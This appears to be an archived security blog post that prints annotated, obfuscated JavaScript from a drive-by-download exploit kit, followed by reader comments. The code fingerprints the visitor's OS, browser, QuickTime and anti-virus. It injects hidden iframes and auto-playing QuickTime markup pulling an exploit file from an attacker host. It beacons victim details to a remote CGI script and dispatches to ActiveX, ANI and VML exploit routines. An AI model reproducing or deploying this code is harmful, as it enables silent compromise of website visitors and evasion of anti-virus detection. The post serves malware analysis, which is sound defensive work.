// QuickTime was found (z1IlaKFl0X == 0) or its version is above 0x730
// (7.3.0, i.e. only older QuickTime is targeted). Runs the heap spray, then
// injects into the hidden DIV "tmp_div1" either an <object> with the
// QuickTime control CLSID {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (IE) or an
// <embed> (other browsers), both auto-playing http://a.njnk.net/E/pl.mov.
// The .mov file carries the actual exploit and is not part of this listing.
// Returns true once the markup has been injected, false when gated out.
// `0 x730` is a garbled hex literal (stray space) in this copy.
function z1IlNFl0X() {
if(z1IlbCFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
if(z1IlaKFl0X == 0) {
return false;
}
if(z1IlaKFl0X > 0 x730) {
return false;
}
z1IltFl0X();
if(z1IlaAFl0X == "ie") {
document.getElementById("tmp_d" + "iv1").innerHTML = "<object "
+ "CL" + "ASS" + "ID" + "=\"clsid:02BF25D" + "5-8" + "C17-4B23"
+ "-BC80-D" + "3488ABD" + "DC6B\" widt" + "h=\"0\" height=" + "\"0\" "
+ "s" + "tyle=\"border:0px\"><par" + "am name=\"src\"" + " value=\"http://"
+ z1IlaoFl0X + "/E/pl.mo" + "v\">" + "<param na" + "me" + "=\"autopla"
+ "y\" value=\"" + "true\"><param n" + "ame=\"l" + "oop\" v"
+ "alue=\"false\"" + "><param" + " name=\"controller\" v" + "alue="
+ "\"t" + "rue\"></obj" + "ect>";
}
else {
document.getElementById("tmp_di" + "v1").innerHTML = "<embed "
+ "s" + "rc=\"ht" + "tp://" + z1IlaoFl0X + "/E/pl.mov\" wi"
+ "dth=\"1\" hei" + "ght=\"1\" " + "l" + "oop=\"" + "f" + "alse\" "
+ "autopl" + "ay=\"true\">";
}
return true;
};
// Busy-wait loop (100k iterations, no side effects). Not called anywhere in
// this listing; x0r1aP2Z has its own inline 10k-iteration copy.
function z1IlaiFl0X() {
for(var i = 0; i < 100000; i++ ) {
var n = i;
}
};
// Fallback scheduler for IE6/IE5 victims when the ActiveX dropper
// (x0r1az2Z) failed. Order of attempts:
//  - If the QuickTime module went in (z1IlNFl0X returned true): on IE with
//    no AV detected (z1IlaLFl0X == 0) queue ANI after 2 s and VML after 4 s;
//    with AV detected, skip ANI and run VML now and again after 2 s.
//  - Otherwise, on IE: Win98 or IE < 6 -> VML only; else ANI now and VML
//    after 4 s without AV, or VML only when AV was detected.
// Timers are setTimeout() with string callbacks built from fragments
// (more signature evasion). Nothing is scheduled for non-IE browsers here.
function x0r1X2Z() {
if(z1IlNFl0X()) {
if(z1IlaAFl0X == "ie") {
if(! z1IlaLFl0X) {
setTimeout("x0r1" + "aG2Z(" + ");", 2000);
setTimeout("x0r1aB2" + "Z(" + ");", 4000);
}
else {
setTimeout("x" + "0r1" + "aB2Z();", 2000);
x0r1aB2Z();
}
}
return;
}
if(z1IlaAFl0X == "ie") {
if(z1IlanFl0X == 48 || z1IlapFl0X < 600) { // Win98 or IE5: VML only
x0r1aB2Z();
return;
}
if(! z1IlaLFl0X) {
x0r1aG2Z();
setTimeout("x0r1a" + "B2Z()" + ";", 4000);
}
else {
x0r1aB2Z();
}
}
};
// Victim beacon. Builds
//   http://a.njnk.net/cgi-bin/jl/jloader.pl?source=<hostname of the
//   compromised site>&system_id=<OS/browser class>&qtver=0x<QuickTime ver>
//   [&iebuild=<IE build>&av_id=<detected AV id>]   (IE only)
// and loads it into the hidden iframe "serv_note_link", so the operator
// learns which injected site delivered the visitor and what was installed.
// `url` is an implicit global. Failures to find the iframe are swallowed.
// For defenders: a request to /cgi-bin/jl/jloader.pl with these parameters
// in proxy logs is a reliable sign a client hit this kit.
function x0r1aC2Z() {
url = "htt" + "p://" + z1IlaoFl0X + "/cgi-bin/" + "jl/jloa" + "der"
+ ".pl?" + "source=" + location.hostname + "&syste" + "m_i" + "d="
+ z1IlamFl0X + "&qtver=0" + "x" + z1IlaKFl0X.toString(16);
if(z1IlaAFl0X == "ie") {
url = url + "&iebuild" + "=" + z1IlaOFl0X + "&av_id" + "=" + z1IlaLFl0X;
}
try {
var z1IlcJFl0X = document.getElementById("serv" + "_note_l" + "ink");
z1IlcJFl0X.src = url;
}
catch(e) {};
};
// Anti-virus fingerprint tables used by x0r1aM2Z (implicit globals).
// z1IlbSFl0X: two ProgIDs probed with `new ActiveXObject` -- judging by
// the prefixes, a Norton AntiVirus configuration-wizard object and a McAfee
// download-manager object. A hit yields av_id = index + 1.
// z1IlbTFl0X: fifteen bare CLSIDs (no braces) probed by injecting
// <object classid="clsid:..."> tags; a control that instantiates without
// an onerror yields av_id = 2 + index + 1. Product names for these CLSIDs
// are not stated in the script and are not guessed here.
z1IlbSFl0X = [ "NA" + "VCfgWizDll.N" + "AVCfg" + "WizMgr", "McGD" + "Mgr.DwnldGroup" + "Mg" + "r"];
z1IlbTFl0X = [ "48F45200-91E6-11CE-8A4F-0" + "0" + "8" + "0C81A28D" + "4",
"091EB208-39DD-417D-" + "A5D" + "D-7" + "E2C2" + "D8FB9CB", "D653647D-" +
"D607-4" + "DF6-A5B8-4" + "8D2BA" + "195F7B", "9F97547E-4" + "609-" + "4" +
"2C5-AE0C-81C61F" + "FAEBC3", "65756541-C6" + "5C-11C" + "D-0000-4B656E69" +
"61" + "00", "1474F601-" + "9B4B-" + "4EB0-81F" + "A-20F753" + "C0E1A4", "D5" +
"5" + "0702" + "0-DB45-1" + "1d1-A5F0-00600872F78D", "D" + "D2" +
"30880-495A-11D1-B064-0" + "08048" + "EC2FC5", "B089FE88-FB5" + "2" +
"-11D3-BDF1-005" + "0DA3415" + "0D", "472083B0-C5" + "22-11CF-8" + "7" +
"63-00608CC02F2" + "4", "45AC2688" + "-0253-4" + "ED8-97" + "DE-B" +
"5370FA7D48A", "893" + "4FCEF-F5B8-468" + "F-9" + "51" + "F-78A921CD3920",
"1EB2409C" + "-6E28-" + "4066-9738-9" + "7A1B8F5" + "639C", "E75" +
"93602-124B-" + "47" + "C9-9F" + "73-A69308EDC973", "B43CB0C0-84F2-1" + "1D6-A"
+ "18E-00C0DF0" + "43" + "BA4"];
// onerror handler for probe <object> number `i` (see x0r1aM2Z): counts the
// failure and nulls the CLSID entry so a later onreadystatechange for the
// same element is not mistaken for a successful instantiation.
function x0r1aK2Z(i) {
z1IlbGFl0X++;
z1IlbTFl0X[ i] = null;
};
// onreadystatechange handler for probe <object> number `i`. If no AV has
// been recorded yet and the entry was not nulled by x0r1aK2Z (i.e. the
// control instantiated), record av_id = 2 + i + 1 and set the latch. This
// presumably relies on onerror firing before readystatechange for a
// missing control; whether IE guarantees that order is not established
// by anything here.
function x0r1aF2Z(i) {
z1IlbzFl0X++;
if(z1IlaHFl0X) {
return;
}
if(z1IlbTFl0X[ i] != null) {
z1IlaLFl0X = z1IlbSFl0X.length + i + 1;
z1IlaHFl0X = 1;
}
};
// AV detection (IE < 7 only, called from x0r1aP2Z). Two phases:
//  1. `new ActiveXObject(progid)` for each entry of z1IlbSFl0X; the first
//     that succeeds sets av_id = index + 1 and the latch, and the function
//     returns 1 immediately.
//  2. Otherwise builds one <object classid="clsid:..."> per CLSID in
//     z1IlbTFl0X with inline onerror/onreadystatechange handlers
//     (x0r1aK2Z / x0r1aF2Z) and assigns the markup to the innerHTML of a
//     DIV that is never attached to the document. Whether IE instantiates
//     controls in a detached element (and fires those events) is not
//     shown here; the result, if any, arrives asynchronously, so the
//     synchronous return value is almost always 0 for this phase.
// The av_id feeds the beacon (x0r1aC2Z) and makes x0r1X2Z drop the ANI
// module when an AV product is present. z1IlcuFl0X is unused.
function x0r1aM2Z() {
var z1IlcsFl0X = "";
try {
var z1IlcuFl0X = 0;
for(i = 0; i < z1IlbSFl0X.length && ! z1IlaLFl0X; i++ ) {
try {
new ActiveXObject(z1IlbSFl0X[ i] );
z1IlaLFl0X = i + 1;
z1IlaHFl0X = 1;
}
catch(e) {};
}
if(z1IlaLFl0X) {
return 1;
}
for(i = 0; i < z1IlbTFl0X.length; i++ ) {
z1IlcsFl0X += "<o" + "bjec" + "t classid=" + "'clsid:" +
z1IlbTFl0X[ i] + "'" + " o" + "nerror='x0" + "r1aK2Z(" + i + ")' onreadystatecha" + "nge='" + "x0" + "r1aF2Z" + "(" + i + ")" + "'><"
+ "/objec" + "t>";
}
document.createElement("div").innerHTML = z1IlcsFl0X; // detached DIV, see note above
}
catch(e) {};
if(z1IlaLFl0X) {
return 1;
}
return 0;
};
// Main entry point, run on DOMContentLoaded (see the bootstrap at the end
// of the file). Steps:
//  1. Short busy loop (possibly a crude sandbox/timing delay).
//  2. Unless in debug mode, bail out if the "served" cookie is already
//     set -- one exploit run per browser.
//  3. Fingerprint: Windows version, browser family (+ IE version/build),
//     QuickTime version.
//  4. Inject the hidden scaffolding: DIV "tmp_div1" (QuickTime markup),
//     IFRAME "serv_note_link" (beacon), IFRAME "z1IlaEFl0X" (exploit
//     pages), SCRIPT "z1IlbeFl0X" (remote script loader), all 0x0.
//  5. Classify the IE victim into a system_id string (ie7_xp, ie7_vista,
//     ie6_2k, ie6_xpsp2/sp1/sp0/xp by build number, ie6_win98,
//     ie6_unknown, ie5_2k, ie5_nt, ie_unknown); run AV detection on
//     IE < 7, or set av_id = -1 on IE 7+. IE5 on NT > 5.0 and unknown
//     Windows versions leave system_id at "none", which matches no case
//     in x0r1aV2Z and so launches nothing.
//  6. For Firefox: compute the ff104 / ff150 class, then unconditionally
//     overwrite it with "ff" -- so only the QuickTime module is ever used
//     against Firefox in this copy (bug or deliberate kill-switch, cannot
//     tell from here).
//  7. Hand off to x0r1aV2Z for beaconing, cookie planting and dispatch.
function x0r1aP2Z() {
for(var i = 0; i < 10000; i++ ) {
var n = i;
}
if(! z1IlbQFl0X && z1IlbPFl0X) {
try {
if(x0r1aU2Z(z1IlbfFl0X) == z1IlbcFl0X) {
return false;
}
}
catch(e) {};
}
z1IlanFl0X = x0r1aJ2Z();
z1IlaAFl0X = x0r1aH2Z();
z1IlaKFl0X = z1IlIFl0X(); // may throw on non-IE without QuickTime; nothing catches it
var tmp_div = document.createElement("DIV");
tmp_div.id = "tmp_di" + "v1";
document.body.appendChild(tmp_div);
var z1IlazFl0X = document.createElement("IFRAM" + "E");
z1IlazFl0X.id = "serv_" + "note" + "_link";
z1IlazFl0X.border = 0;
z1IlazFl0X.frameborder = 0;
z1IlazFl0X.width = 0;
z1IlazFl0X.height = 0;
document.body.appendChild(z1IlazFl0X);
var z1IlaEFl0X = document.createElement("IFRA" + "ME");
z1IlaEFl0X.id = "z" + "1I" + "laEFl0X";
z1IlaEFl0X.border = 0;
z1IlaEFl0X.frameborder = 0;
z1IlaEFl0X.width = 0;
z1IlaEFl0X.height = 0;
document.body.appendChild(z1IlaEFl0X);
var z1IlbeFl0X = document.createElement("SCRIP" + "T");
z1IlbeFl0X.id = "z1Il" + "beF" + "l0X";
document.body.appendChild(z1IlbeFl0X);
if(z1IlaAFl0X == "ie" && z1IlanFl0X != 0) {
if(z1IlapFl0X >= 700 && z1IlapFl0X < 800) {
if(z1IlanFl0X < 60) {
z1IlamFl0X = "i" + "e7_xp";
}
else {
z1IlamFl0X = "ie7_" + "vista";
}
}
else if(z1IlapFl0X >= 600 && z1IlapFl0X < 700) {
if(z1IlanFl0X == 50) {
z1IlamFl0X = "ie6_2" + "k";
}
else if(z1IlanFl0X == 51) {
if(z1IlaOFl0X >= 60029002180) { // 6.0.2900.2180 = XP SP2
z1IlamFl0X = "ie" + "6_xpsp2";
}
else if(z1IlaOFl0X >= 60028001106) { // 6.0.2800.1106 = XP SP1
z1IlamFl0X = "ie" + "6_xpsp1";
}
else if(z1IlaOFl0X == 60026000000) { // 6.0.2600.0000 = XP RTM
z1IlamFl0X = "ie6" + "_xpsp0";
}
else {
z1IlamFl0X = "ie" + "6_xp";
}
}
else if(z1IlanFl0X == 48) {
z1IlamFl0X = "ie6_w" + "in98";
}
else {
z1IlamFl0X = "ie6_" + "u" + "nknown";
}
}
else if(z1IlapFl0X >= 500 && z1IlapFl0X < 600) {
if(z1IlanFl0X == 50) {
z1IlamFl0X = "ie" + "5_2k";
}
else if(z1IlanFl0X < 50) {
z1IlamFl0X = "i" + "e5_nt";
}
}
else {
z1IlamFl0X = "ie_unkn" + "o" + "wn";
}
if(z1IlapFl0X < 700) {
x0r1aM2Z();
}
else {
z1IlaLFl0X = - 1;
}
}
if(z1IlaAFl0X == "fir" + "efox" && z1IlanFl0X != 0) {
var z1IlawFl0X = 0;
z1IlawFl0X = x0r1aD2Z();
if(z1IlawFl0X <= 1000400) {
z1IlamFl0X = "ff" + "104";
}
if(z1IlawFl0X > 1000400 && z1IlawFl0X <= 1050004) {
z1IlamFl0X = "ff" + "150";
}
z1IlamFl0X = "ff"; // overrides both branches above
}
x0r1aV2Z();
};
// Sets the browser status-bar text; used by x0r1aV2Z to fake an
// "Opening <url>..." / "Done" progression while the exploits run.
function x0r1ay2Z(z1IlcdFl0X) {
window.status = z1IlcdFl0X;
};
// Dispatch stage. Sets the AV latch (stopping late x0r1aF2Z updates),
// sends the beacon, shows a fake "Opening ..." status (reset to "Done" after
// 30 s), plants the one-year "served" cookie, then picks the exploit path
// by system_id:
//   ie7_xp                      -> QuickTime only
//   every ie6_* / ie5_* / ie_unknown -> ActiveX dropper (x0r1az2Z); if
//                                  that returns false, x0r1X2Z's
//                                  QuickTime/ANI/VML schedule
//   ff104 / ff150               -> Firefox exploit pages (unreachable, see
//                                  x0r1aP2Z)
//   ff                          -> QuickTime (falls through to default)
// There is no case for ie7_vista or "none", so those victims get the
// beacon and the cookie but no exploit.
function x0r1aV2Z() {
z1IlaHFl0X = 1;
x0r1aC2Z();
x0r1ay2Z("Openin" + "g " + window.location.href + "...");
setTimeout("x" + "0r1ay2Z('Done'" + ")", 30000);
try {
x0r1aR2Z(z1IlbfFl0X, z1IlbcFl0X);
}
catch(e) {};
var z1IlbgFl0X = false;
switch(z1IlamFl0X) {
case "ie7_x" + "p" : z1IlNFl0X();
break;
case "ie6_" + "xpsp0" : case "ie6" + "_2k" : case "ie6_xpsp" + "1" :
case "ie6_xp" + "sp2" : case "ie" + "6_xp" : case "ie6_un" + "know" + "n" :
case "i" + "e6_win98" : case "ie5_" + "2k" : case "ie5" + "_nt" :
case "ie5_unkno" + "w" + "n" : case "i" + "e_unk" + "nown" : try {
z1IlbgFl0X = x0r1az2Z();
}
catch(e) {}
if(! z1IlbgFl0X) {
x0r1X2Z();
}
break;
case "ff" + "104" : x0r1aT2Z();
break;
case "ff1" + "50" : x0r1aS2Z();
break;
case "ff" : z1IlNFl0X();
default : break;
}
};
// Bootstrap: run x0r1aP2Z once the DOM is ready. Standards browsers get a
// DOMContentLoaded listener; IE (no addEventListener at the time) gets the
// classic deferred-script trick -- a document.write()n <script defer
// src="javascript:void(0)"> whose readyState reaches "complete" only after
// the document has been parsed.
if(document.addEventListener) {
document.addEventListener("DOMC" + "ontentLoade" + "d", x0r1aP2Z, false);
}
else {
document.write("<scr" + "ipt id=__ie_onload defe" + "r" + " src=javascr" + "ipt:v" + "o" + "id(0)><\/scri" + "pt>");
var script = document.getElementById("__ie" + "_onlo" + "ad");
script.onreadystatechange = function() {
if(this.readyState == "c" + "omplete") {
x0r1aP2Z();
}
};
}
Don't get too excited about this source, as on its own it is of limited use; there are a few things you can learn from it, but that is as far as it goes. To me it looks like a wrapper around the real thing: it fingerprints the browser, OS, QuickTime and anti-virus product, reports back to the operator, and then dispatches to exploit pages (VML, ANI, QuickTime, Firefox) and downloaded binaries that are not included here. In other words it is the front end of a drive-by-download attack. But don't take my word for it; have a look yourselves.
Archived Comments
meathive
I left a message for Ronald regarding a similar find for an obscured PHP backdoor: https://kinqpinz.info/lib/2008/mar/#c61a1757
Hope this is not too off topic. ;]
When I read this RSS feed from your blog, NOD32 showed me a malware alert.
I think it is because this page contains a sample of malware code, and NOD32 concludes that malware is present on the page.
Edgar from Bangkok
Now, i add screenshot about problem over my Security Internet Blog at post
http://edetools.blogspot.com/2008/03/curiosita.html
Edgar from Bangkok
Edgar, this case confirms that modern technologies cannot make sense of Web/Client-side attacks and vulnerabilities. They are shooting in the dark by performing a global match against a signature without verifying if that signature is actually within an executable block. Thanks for letting us know. It is an excellent example I can use for future reference.
Edgar, I didn't get that problem at all, though I was using NOD32 total security. Mine went fine and normal, like before.
Hola Pdp ,
SuperCool talk ,
The JS code still shows tell-tale functions such as:
.WriteText(
.SaveToFile(
etc., which can only be useful as part of a payload after an exploit has run.
Dror
Well, actually the files that get placed on someone's PC are the least interesting part, since they are not what matters here. The code above shows that it uses heap spraying to execute shellcode, which is more important to analyze than the next .bat file, which is a no-brainer anyway.
Bharadwaj, I use an old version, NOD32 2.5.
I think I may get the NOD32 alert because I have switched on all the ThreatSense scanning-engine options.
Thanks for the post. I was searching for an example . Just wish people would keep their MS servers patched, as it would make it a better environment for the normal web surfer.
Jason